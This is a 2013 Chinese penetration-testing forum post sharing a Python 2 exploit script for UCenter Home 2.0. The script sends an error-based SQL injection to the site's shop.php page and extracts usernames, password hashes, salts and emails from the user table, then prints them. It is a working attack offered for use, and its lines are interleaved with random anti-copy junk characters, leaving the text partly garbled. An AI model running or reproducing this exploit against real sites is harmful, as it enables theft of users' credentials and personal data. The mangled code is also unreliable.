找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1941|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ d; [! n( E* s2 R) V
5 s& R6 a4 M" f5 \9 r1 Z0 ~9 a+ R6 [2 R! I* q; N3 C9 t
#!/usr/bin/env python  $ F  b6 }9 R2 G3 n1 a

3 M5 B4 g) ]% J7 E! \; W& Simport sys  
1 l1 o1 E% F! d( H' a5 oimport urllib2  & g& V; J! W  |; N3 m. {
import re  
6 Q2 J! V1 i# a& \
5 A! a0 x6 }$ q: s: `def info():  
2 T8 i# p+ j6 M& S1 K( X    print 'From:http://www.exploit-db.com/exploits/14997/' : J8 f+ e# M! P: ~5 n5 _* u3 h* b; a& n. r
    print 'http://www.hake.cc/Web_loudong/'
; O6 T- ^% i( d9 R/ s+ A0 X    print 'changed:qiaoy'  
8 G3 [, I3 R2 s; r0 Z6 y# u- L    print 'exp:'  
0 l5 n8 o* y+ F+ p  w0 ]+ L    print ' ./UCenter_Home_2.0.py site'  
5 e: b, D- q# i2 [# h, r 7 X/ `% S; Q3 f! A
def main():  & S( M4 t) ?( p: Z- N' P% l
    if len(sys.argv) != 2:  
8 k2 Q" Q% ~1 |4 @6 X: M' D        info()  
; p+ O. o/ _4 R8 K1 x    else:  
9 N: ]4 l, t8 g# P; r        site = sys.argv[1]  4 F/ V& s/ L) S5 ^) n5 F
        if site[0:7] == 'http://':  
8 Q/ M6 K. {3 k# p$ L; j9 l9 [9 i            sitesite =site  & A! m2 I" s) ^* e
        elif site[0:8] == 'https://':  2 L, x  n1 [- X* T: t" Y2 |
            sitesite = site  
4 v  @3 U+ Q  ^+ f0 t! ~* }* [+ x: T        else:  
7 q8 l8 ^8 W1 m! f; _2 j  ~            site = 'http://'+site  
" i3 r8 H4 d: m7 x+ L' r        try:  2 i! O) Q1 R4 O. O4 \
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  - d% G4 Q& v! B
            Value = urllib2.urlopen(url).read()  " ]5 X/ V, O; I/ e% L
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  8 V; t& S; l# |. y( l  u
            hacked = Msg.split(':')  * l8 l' a. |5 p1 b$ @
            print 'Name:    '+hacked[1]  + e* v' x) o* C# O
            print 'Passwd:  '+hacked[2]  
5 m2 B2 o# x9 q% H- ?# i            print 'salt:    '+hacked[3]  
8 ~1 V# `, c7 H& x            print 'email:   '+hacked[4]  & r4 P2 W, z8 L! S/ ~
        except:  % p3 ^1 t/ i, z( ~$ [
            print 'Sorry,I can\'t work............'  
$ E  N+ G' ?# k& d& }
* A/ t. R" c. O6 Zif __name__ == '__main__':  
8 J9 R1 U3 A: g/ U, Q    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表